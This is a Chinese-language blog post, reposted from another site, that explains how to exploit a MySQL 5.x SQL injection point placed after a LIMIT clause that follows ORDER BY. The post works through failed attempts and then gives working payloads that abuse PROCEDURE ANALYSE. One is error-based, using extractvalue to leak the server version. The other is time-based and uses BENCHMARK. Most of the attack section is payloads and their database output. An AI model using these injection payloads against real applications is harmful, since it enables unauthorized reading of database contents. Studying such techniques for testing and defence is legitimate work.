Mysql注入點在limit關鍵字後面的利用方法

edithfang發表於2015-01-28

細節

在一次測試中，我碰到了一個sql注入的問題，在網上沒有搜到解決辦法，當時的注入點是在limit關鍵字後面，資料庫是MySQL5.x,SQL語句類似下面這樣：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入點】

問題的關鍵在於，語句中有order by 關鍵字，我們知道，mysql 中在order by 前面可以使用union 關鍵字，所以如果注入點前面沒有order by 關鍵字，就可以順利的使用union 關鍵字，但是現在的情況是，注入點前面有order by 關鍵字，這個問題在stackoverflow 上和sla.ckers上都有討論，但是都沒有什麼有效的解決辦法。

我們先看看 mysql 5.x 的文件中的 select 的語法：

SELECT 
[ALL | DISTINCT | DISTINCTROW ]  
[HIGH_PRIORITY]  
[STRAIGHT_JOIN]  
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  
select_expr [, select_expr ...]  
[FROM table_references  
[WHERE where_condition]  
[GROUP BY {col_name | expr | position}  
[ASC | DESC], ... [WITH ROLLUP]]  
[HAVING where_condition]  
[ORDER BY {col_name | expr | position}  
[ASC | DESC], ...]  
[LIMIT {[offset,] row_count | row_count OFFSET offset}]  
[PROCEDURE procedure_name(argument_list)]  
[INTO OUTFILE 'file_name' export_options  
| INTO DUMPFILE 'file_name' 
| INTO var_name [, var_name]]  
[FOR UPDATE | LOCK IN SHARE MODE]]

limit 關鍵字後面還有 PROCEDURE 和 INTO 關鍵字，into 關鍵字可以用來寫檔案，但這在本文中不重要，這裡的重點是 PROCEDURE 關鍵字.MySQL預設可用的儲存過程只有 ANALYSE (doc)。
嘗試用這個儲存過程：

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);  
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支援兩個引數，試試兩個引數：

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);  
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

依然無效，嘗試在 ANALYSE 中插入 sql 語句：

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

響應如下：

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’

事實證明，sleep 沒有被執行，最終，我嘗試瞭如下payload ：

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

啊哈，上面的方法就是常見的報錯注入，所以，如果注入點支援報錯，那所有問題都ok，但是如果注入點不是報錯的，還可以使用 time-based 的注入，payload 如下：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

有意思的是，這裡不能用sleep而只能用 BENCHMARK。

另外，這裡還有一種類似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30

來自：http://netsecurity.51cto.com/art/201501/464519.htm

MYSQL 資料庫安全 SQL

評論(2)

mysql-小數點後面的0
2018-08-16
MySql
js關鍵字和方法
2020-11-27
JS
mysql 中的explain關鍵字
2019-02-26
MySqlAI
Sqlserver update\delete用inner join關聯，會update\delete關鍵字後面的表關聯到的行
2022-10-18
SQLServerdelete
mysql帶IN關鍵字的查詢
2020-12-05
MySql
在Java中this關鍵字的使用
2020-10-27
Java
如何高效利用 GitHub 關鍵字進行搜尋
2019-12-15
Github
java構造方法-this關鍵字的用法
2018-02-04
Java構造方法
this關鍵字
2024-08-01
關鍵字
2024-08-04
網站關鍵詞堆砌後，處理關鍵詞堆砌方法
2020-10-18
網站
在IT運維管理方面的關注點（轉載）
2007-09-11
運維
MySQL 5.7中的關鍵字和保留字
2016-11-03
MySql
在資料庫中查詢關鍵字
2011-01-20
資料庫
關於mysql 子查詢中使用 limit
2017-07-18
MySqlMIT
postgresql和mysql中的limit使用方法
2024-11-03
MySqlMIT
abstract關鍵字 super 關鍵字類與繼承
2019-04-02
繼承
out關鍵字和ref關鍵字的區別
2024-09-29
開發必備詞典：Mysql保留關鍵字
2019-02-16
MySql
mysql新建表和多表查詢，關鍵字join
2018-07-30
MySql
mysql帶AND關鍵字的多條件查詢
2020-12-05
MySql
Swift 關鍵字
2019-08-22
Swift
typedef關鍵字
2020-11-09
Synchronized關鍵字
2017-11-21
synchronized
JavaScript this關鍵字
2017-12-14
JavaScript
Swift —— 關鍵字
2018-01-11
Swift
oracle關鍵字
2011-11-29
Oracle
Auto關鍵字
2024-03-06
[JavaScript] this 關鍵字
2024-10-03
JavaScript
4關鍵字
2024-10-10
super關鍵字
2024-08-01
synchronized 關鍵字
2024-08-11
synchronized
static關鍵字
2024-08-16
如何看待智慧數字經營的關鍵點？
2021-05-29
SQL隱碼攻擊點搜尋關鍵字
2017-11-12
SQL
避免在程式碼中直接使用delete關鍵字
2008-09-09
delete
MySQL LIMIT 如何改寫成Oracle limit
2018-01-16
MySqlMITOracle
反編譯使用yield關鍵字的方法轉
2010-01-26
編譯

Mysql注入點在limit關鍵字後面的利用方法

相關文章